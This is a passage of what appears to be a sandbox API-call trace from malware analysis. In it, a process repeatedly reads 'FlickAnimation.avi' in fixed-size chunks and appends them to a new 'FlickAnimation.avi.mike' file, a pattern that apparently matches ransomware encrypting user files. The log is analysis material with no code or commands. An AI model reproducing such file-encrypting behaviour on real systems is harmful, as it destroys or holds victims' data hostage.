[0043.145] GetFileType (hFile=0x264) returned 0x1 [0043.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.145] GetFileType (hFile=0x264) returned 0x1 [0043.145] SetFilePointer (in: hFile=0x264, lDistanceToMove=348160, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x55000 [0043.145] ReadFile (in: hFile=0x264, lpBuffer=0x22aeffc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22aeffc*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.146] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.146] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.147] GetFileType (hFile=0x264) returned 0x1 [0043.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.147] GetFileType (hFile=0x264) returned 0x1 [0043.147] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x55220 [0043.147] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.147] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.147] GetFileType (hFile=0x264) returned 0x1 [0043.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.147] GetFileType (hFile=0x264) returned 0x1 [0043.147] SetFilePointer (in: hFile=0x264, lDistanceToMove=358400, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x57800 [0043.147] ReadFile (in: hFile=0x264, lpBuffer=0x22bbfd4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22bbfd4*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.149] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.149] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.149] GetFileType (hFile=0x264) returned 0x1 [0043.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.149] GetFileType (hFile=0x264) returned 0x1 [0043.149] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x57a20 [0043.149] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.149] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.149] GetFileType (hFile=0x264) returned 0x1 [0043.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.150] GetFileType (hFile=0x264) returned 0x1 [0043.150] SetFilePointer (in: hFile=0x264, lDistanceToMove=368640, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x5a000 [0043.150] ReadFile (in: hFile=0x264, lpBuffer=0x22c8fac, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22c8fac*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.151] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.151] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.151] GetFileType (hFile=0x264) returned 0x1 [0043.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.151] GetFileType (hFile=0x264) returned 0x1 [0043.151] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x5a220 [0043.152] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.152] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.152] GetFileType (hFile=0x264) returned 0x1 [0043.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.152] GetFileType (hFile=0x264) returned 0x1 [0043.152] SetFilePointer (in: hFile=0x264, lDistanceToMove=378880, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x5c800 [0043.152] ReadFile (in: hFile=0x264, lpBuffer=0x22d5f84, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22d5f84*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.153] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.153] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.153] GetFileType (hFile=0x264) returned 0x1 [0043.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.154] GetFileType (hFile=0x264) returned 0x1 [0043.154] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x5ca20 [0043.154] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.154] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.154] GetFileType (hFile=0x264) returned 0x1 [0043.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.154] GetFileType (hFile=0x264) returned 0x1 [0043.154] ReadFile (in: hFile=0x264, lpBuffer=0x22e2f5c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22e2f5c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.156] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.156] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.157] GetFileType (hFile=0x264) returned 0x1 [0043.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.157] GetFileType (hFile=0x264) returned 0x1 [0043.157] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x5f220 [0043.157] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.157] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.157] GetFileType (hFile=0x264) returned 0x1 [0043.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.157] GetFileType (hFile=0x264) returned 0x1 [0043.157] ReadFile (in: hFile=0x264, lpBuffer=0x20f1740, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x20f1740*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.158] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.159] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.159] GetFileType (hFile=0x264) returned 0x1 [0043.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.159] GetFileType (hFile=0x264) returned 0x1 [0043.159] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x61a20 [0043.159] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.159] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.159] GetFileType (hFile=0x264) returned 0x1 [0043.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.159] GetFileType (hFile=0x264) returned 0x1 [0043.160] ReadFile (in: hFile=0x264, lpBuffer=0x20fe718, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x20fe718*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.161] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.161] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.161] GetFileType (hFile=0x264) returned 0x1 [0043.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.161] GetFileType (hFile=0x264) returned 0x1 [0043.161] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x64220 [0043.161] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.161] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.162] GetFileType (hFile=0x264) returned 0x1 [0043.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.162] GetFileType (hFile=0x264) returned 0x1 [0043.162] ReadFile (in: hFile=0x264, lpBuffer=0x210b6f0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x210b6f0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.163] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.163] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.163] GetFileType (hFile=0x264) returned 0x1 [0043.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.163] GetFileType (hFile=0x264) returned 0x1 [0043.163] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x66a20 [0043.164] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.164] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.164] GetFileType (hFile=0x264) returned 0x1 [0043.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.164] GetFileType (hFile=0x264) returned 0x1 [0043.164] ReadFile (in: hFile=0x264, lpBuffer=0x21186c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21186c8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.165] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.165] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.165] GetFileType (hFile=0x264) returned 0x1 [0043.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.165] GetFileType (hFile=0x264) returned 0x1 [0043.165] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x69220 [0043.165] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.166] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.166] GetFileType (hFile=0x264) returned 0x1 [0043.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.166] GetFileType (hFile=0x264) returned 0x1 [0043.166] ReadFile (in: hFile=0x264, lpBuffer=0x21256a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21256a0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.167] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.167] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.167] GetFileType (hFile=0x264) returned 0x1 [0043.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.167] GetFileType (hFile=0x264) returned 0x1 [0043.167] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x6ba20 [0043.167] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.167] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.168] GetFileType (hFile=0x264) returned 0x1 [0043.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.168] GetFileType (hFile=0x264) returned 0x1 [0043.168] ReadFile (in: hFile=0x264, lpBuffer=0x2132678, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2132678*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.170] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.170] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.170] GetFileType (hFile=0x264) returned 0x1 [0043.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.170] GetFileType (hFile=0x264) returned 0x1 [0043.170] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x6e220 [0043.170] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.170] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.171] GetFileType (hFile=0x264) returned 0x1 [0043.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.171] GetFileType (hFile=0x264) returned 0x1 [0043.171] ReadFile (in: hFile=0x264, lpBuffer=0x213f650, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x213f650*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.172] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: 